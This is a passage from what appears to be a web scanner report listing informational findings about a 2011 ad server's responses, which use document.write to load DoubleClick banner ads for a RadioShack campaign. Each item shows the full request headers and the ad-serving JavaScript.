Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12477363337@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270288

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:10:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=682100952?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=682100952?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=682100952?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.105. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The page was loaded from a URL containing a query string. The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806249011?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806249011?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806249011?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806249011?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.106. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; NSC_o4efm_qppm_iuuq=ffffffff09419e2a45525d5f4f58455e445a4a423660; session=1296251852|1296251875; ATTWL=CollectiveB3

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:08:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1824141209?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1824141209?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.107. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296271345

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:27:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1076249577?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1076249577?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.108. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269250

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:59:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=838084819?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=838084819?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.109. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1452529046?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1452529046?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.110. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806261365?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
